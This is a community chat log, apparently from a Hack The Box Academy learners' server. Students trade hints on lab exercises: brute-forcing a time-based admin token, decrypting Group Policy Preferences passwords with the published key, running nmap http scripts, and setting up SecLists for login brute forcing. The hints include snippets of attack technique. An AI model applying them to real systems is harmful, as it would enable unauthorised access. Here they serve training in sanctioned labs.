how do i know when to use the resources given in the lecture and when to not? i mean i asume when it doesn't works right? but how a begginer like me should know about these commands, like wget is not even listed in the lecture

Do the Information Security Foundations path then

I see, ok that makes sense, i started the bug bounty path and i though it will start from 0 but i guess not

ok thanks @fathom pendant

Also -O should work

Don't know if you need the quotes though

Can u help me
@z3.solver

@languid dawn

Why do you tempt fate by @ a mod?

Can you help me?

Just say what you need help with.

probably related to this #cdsa message

I want to learn.how to hack WiFi

Plenty of free resources on that

There is no module about WiFi hacking.
At Offsec there is a course about it

The closest you get is a blue team module on it

Maybe this one
https://www.offsec.com/courses/pen-210/

same

This is about WiFi hacking
https://www.offsec.com/courses/pen-210/

you only need to pay the small price of 800 dollars

Why? Can’t pay for your own?

If it is about the question in which a token for the admin is created within +/-1 second, then you need to create another 2000 tokens.
For every millisecond one token. You can then test this token against the web application.
If it doesn't work, create the next token, and so on.

If you look at the example screenshot and command, you should start there

Also spoilers in image

hmm, does this make sense? Since i'm not really good at coding, especially with math/time, i'm trying to use chatgpt/the script in the module/ || now = int(time())
start_time = now - 2000
fail_text = "Wrong token"||

still dont get it. || Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB || isn't a ticket file. and the other one belongs to wrong user...

You don't always need a ticket file, read the section carefully

#1157735501516779711

This isn't the place for boxes #1157735501516779711 , to gain access to more of the server read #welcome

Read and follow #welcome

Honestly they even made the welcome thing the first thing people see when they join the server and people click through it

sorry man, I'm lost. not sure what you are reffering to

The type of file is still a type of ticket file, just not what you're expecting for some reason

hello baby

Kindly go fuck yourself with a cactus

AHAHAHA

ok i stop now

Now() will not work. You need the time which is displayed after clicking the button

The section explains the different types of files you'll work with

Anyone know how can I decrypt the AES encrypted string using this key? https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be

i have string like this edBSHOwhZLTjt/QS9FeJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ.
Key in the link is like this 4E9906E8FCB66CC9FAF49310620FFEE8F496E806CC057990209B09A433B66C1B
AES decryption services tell me that Length of secret key should be 32 for 256 bits key size

Tell me where I am stupid please

What module is this regarding?

If it's not related to an academy module, please refer to #welcome and #rules on how to access more of the server

imagine Microsoft is using only that key 😹

that is just an example

also the key is indeed 32 bits in hexadecimal

I believe they are using only that key for gpp encryption

what is the reason to use encryption and then give the key to everyone

referring to ||keytabs|| ?

Nope

It's related to the solution you found in the question before that. Maybe you can use that in a search.

Again you're thinking too narrow. You've technically already used a file of that type iirc from that section

@late crow check your dm

But again reading the section tells you the different types

I am not sure, you might wanna ask Microsoft themselves.
I refered to this resource https://adsecurity.org/?p=2288

I'm so stuck..

Sir I will tell you right now, you do indeed have everything you need, I just think you're overthinking it

have you tried what it tells you about the PowerSploit module

Hi! Absollutely stuck inhttps://academy.hackthebox.com/module/112/section/1079 I see opened the RDP and closed the MSSQL ports.

Sometimes a service is only available internally

Yup, i suppose that MSSQL is in internal subnet. But have no tips about the user to try to connect to RDP

Well maybe there's more open than you're seeing, did you do a full port scan of the target?

I should also be using the server time right? not my own time zone?

na

you just use time.time() which defaults to UTC

When you click on the button, you will be given a time. From this time you have to create a token one second back and one second forward for each millisecond.

just abuse the give time is UTC

given

you do not have to use the given time directly in the script to solve the question

If you click the button with your script, then you know the exact time. Otherwise you have to use the time that is given. Because the token that is generated. +/- 1 second from the given time is generated.

i was doing it a little dirty with curl <click button> && python3 script.py

🤣

Can any one make me a free logo?

https://tenor.com/view/spongebob-how-many-times-do-we-need-to-teach-you-old-man-slow-thick-gif-12272188

First you need to click a button on the page. Then a user token will be created.
In the time range +/- 1 second a second token (Admin Token) is created.
The user token and the time will be displayed. From there you can calculate the Admin Token.

how long does the bruteforce normally take lol

For 2001 tokens? Not very long

yes and jajaja

i did the button request with curl instead within the python script because lazyness

Haha, you could have just clicked the button on the page. That would have been even lazier

i was like maybe im slower HAHAHAHA

Then you only have to transfer the time that is displayed into your script and run your script.

that is done with datetime library?

Motherclucker.. I did it!

You get really humbled when you find the solution after this amount of time

and feel stupid ^^

Like I said you had all the info, you just over thought what was staring at you

Needs to keep reminding myself of paying attention to the details. both in the q and the text

Yep this is why proper note taking is important, not just copy/paste word for word

check

needs to get better at this

Bc tbh learning how to parse fluff out of text is a super useful skill, word problems in math really help with that

I'm in the server, now stuck to loggin MSSQL 🫡

There's an important document to find before moving forward

i just wanna say i got the token now finally haha

thx for your help

Yup, found in ||NFS directory||. But stuck in MSSQL console

Honestly this module doesn't do a great job at explain mssql and only really tells you about the GUI

Thats not the documentation I'm talking about, it's something the user you have access to has - you're not gonna get anywhere in mssql as the given user, you'll need to escalate

the section was Nmap Scripting Engine

I did look at the hint

You're probably overthinking it, just use the http scripts as shown in the section

I did and was was asking do I need to try one of the many exploits

No

Exploiting is not needed

Check the robots.txt of the webserver if I'm recalling right

Which is what the http script should do

Try sudo nmap <target> - -script=‘http*’

In the Module "Using the Metasploit Framework" I cannot figure out the exact wording for the answer to the second question "Which version of Metasploit is free and can be used only through a CLI?"
Can someone help please?

I tried the robots.txt flag and it told me it wasn't correct

The question is really basic but I'm still not sure if I should post the answers I tried here. I tried different casing also using one word or two words or an abbreviation. All to no avail.

If you read the section carefully it will tell you: hint I believe it's the tool you use frequently

Do they mean the actual executable, rather than the name of the product? 🤦‍♂️

Yeah, they do. That is a very frustratingly worded question!

Especially because in the question right above it, they asked for the name of the product.

But thanks @fathom pendant ! 🙂

The answer is both

I got it to work I must have had an extra space or something

That's not clear from the text of the module, let alone the graphics. Most of the text speaks of "Metasploit Pro" vs "Metasploit Framework". At least at first. Later it seems to be used interchangably.

Msf stands for Metasploit framework and then console

I know. But at least to me, the wording was misleading.
I may also just be a bit sore about those 0-cube questions in general. They feel like an unnecessary chore to me, because most can be answered without thinking and when they don't it tends to be a wording or case problem. That just feels anoying to me.
That being said. I am aware that my being annoyed by such a trivial thing is irrational and I'll shut up about it now. 🙂

Hello, I have a question, I'm doing the brute force module and I need do to my first bruteforce attack to validate a question but I would like to do it on my own vm (parrot htb linux). they say that I can find a passwordlist on /opt/useful/SecLists/Passwords/Default-Credentials but there is nothing in my vm, I can only find it on the vm of the website

Did I miss something when I setted up my vm ?

brute force module?

That question annoyed me too

seclists does not come preinstalled on Parrot

"LOGIN BRUTE FORCING"

just git clone the repo somewhere in your system

oh ok, there is nothing explained on this in the module

or use it with cook

it is explained

where can I find this seclist?

re read

re read

Usually there's a link to tools in the section

you are 1 google search apart from the answer

ok yes ty I found it

any time

Nah it's a shitty question altogether but it's whatever

so I have the link : https://github.com/danielmiessler/SecLists. Do I have to navigate on etc then I do git clone https://github.com/danielmiessler/SecLists ?

its the first time i do that ^^

If you want to

Or you can git clone to your home directory

And just reference it from there in your commands

how are you in the login brute force module

┌[parrot@wary creek]-[14:00-06/10]-[/etc]
└╼$ git clone https://github.com/danielmiessler/SecLists
fatal: could not create work tree dir 'SecLists': Permission denied

/etc is a write protected directory

i suggest you to do easier modules

sudo

first understand the basics

i already did the linux fundamental

sure?